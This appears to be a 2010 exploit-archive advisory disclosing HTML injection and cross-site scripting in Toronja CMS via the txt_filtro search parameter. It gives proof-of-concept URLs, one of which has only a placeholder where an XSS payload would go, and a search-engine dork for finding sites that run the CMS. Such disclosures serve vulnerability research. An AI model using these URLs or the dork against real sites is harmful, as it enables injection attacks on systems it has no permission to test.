[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Toronja Cms HTML/XSS Injection Vulnerability
# Published : 2010-05-27
# Author : CoBRa_21
# Previous Title : toronja cms SQL Injection Vulnerability
# Next Title : Realtor WebSite System E-Commerce SQL Injection Vulnerability


-------------------------------------------------------------------------------------------

Toronja Cms HTML/XSS Injection Vulnerability
 
-------------------------------------------------------------------------------------------
 
Author : CoBRa_21

Script Home : http://www.toronja.com.pe/

Dork : intext:"sitio web dise?ado por www.toronja.com.pe"

-------------------------------------------------------------------------------------------

HTML Injection:

http://localhost/[path]/index.php?plantilla=busqueda&txt_filtro=<font size=15 color=green>CoBRa_21</font>HTML

-------------------------------------------------------------------------------------------

XSS Injection:

http://localhost/[path]/index.php?plantilla=busqueda&txt_filtro=XSS

-------------------------------------------------------------------------------------------